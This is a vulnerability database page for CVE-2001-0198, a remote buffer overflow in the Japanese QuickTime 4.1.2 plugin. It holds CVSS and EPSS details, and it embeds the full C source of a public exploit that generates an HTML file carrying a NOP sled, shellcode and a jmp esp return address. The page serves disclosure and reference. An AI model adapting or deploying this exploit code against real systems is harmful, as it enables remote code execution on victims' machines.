CVE-2001-0198 : Detail

CVE-2001-0198

4.79%V4
Network
2001-03-09
04h00 +00:00
2017-12-18
20h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in QuickTime Player plugin 4.1.2 (Japanese) allows remote attackers to execute arbitrary commands via a long HREF parameter in an EMBED tag.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 20605

Publication date : 2012-08-17 22h00 +00:00
Author : UNYUN
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2328/info Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow. A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code. /*==================================================================== Apple QuickTime 4.1.2 plug-in exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ==================================================================== */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #define MOV_FILE "c:\\program files\\quicktime\\sample.mov" #define HEIGHT 60 #define WIDTH 60 #define TARGET "QUICKTIMEPLAYER" #define FILE_IMAGE \ "<html><embed src=\"%s\" href=\"%s\" "\ "width=%d height=%d autoplay=\"true\" "\ "target=\"%s\"><br></html>" #define BUFSIZE 730 #define RET 684 #define ESP_TGT "rpcrt4.dll" #define JMPESP_1 0xff #define JMPESP_2 0xe4 #define NOP 0x90 unsigned char exploit_code[200]={ 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50, 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48, 0xFF,0xD0,0x00, }; main(int argc,char *argv[]) { FILE *fp; char buf[BUFSIZE]; unsigned int i,pretadr,p,ip,kp; MEMORY_BASIC_INFORMATION meminfo; if (argc<2){ printf("usage : %s Output_HTML-fileName [Sample .mov file]\n", argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){ printf("%s is not found.\n",ESP_TGT); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); pretadr=0; for (i=0;i<meminfo.RegionSize;i++){ p=kp+i; if ( ( p &0xff)==0 || ((p>>8 )&0xff)==0 || ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue; if ( *((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==JMPESP_2) pretadr=p; } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("File write error \"%s\"\n",argv[1]); exit(1); } memset(buf,NOP,BUFSIZE); memcpy(buf+700-12,exploit_code,strlen(exploit_code)); buf[BUFSIZE-2]=0; ip=pretadr; printf("EIP=%x\n",ip); buf[RET ]=ip&0xff; buf[RET+1]=(ip>>8)&0xff; buf[RET+2]=(ip>>16)&0xff; buf[RET+3]=(ip>>24)&0xff; if (argc==2) fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET); else fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET); fclose(fp); printf("Done.\n"); } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (SPS-Official) unyun@shadowpenguin.org (Personal) % eEye Digital Security Team [ http://www.eEye.com ] unyun@eEye.com

Products Mentioned

Configuraton 0

Apple>>Quicktime >> Version 4.1.2

References

http://www.securityfocus.com/bid/2328
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/20605
Tags : exploit, x_refsource_EXPLOIT-DB
http://marc.info/?l=bugtraq&m=98096678523370&w=2
Tags : mailing-list, x_refsource_BUGTRAQ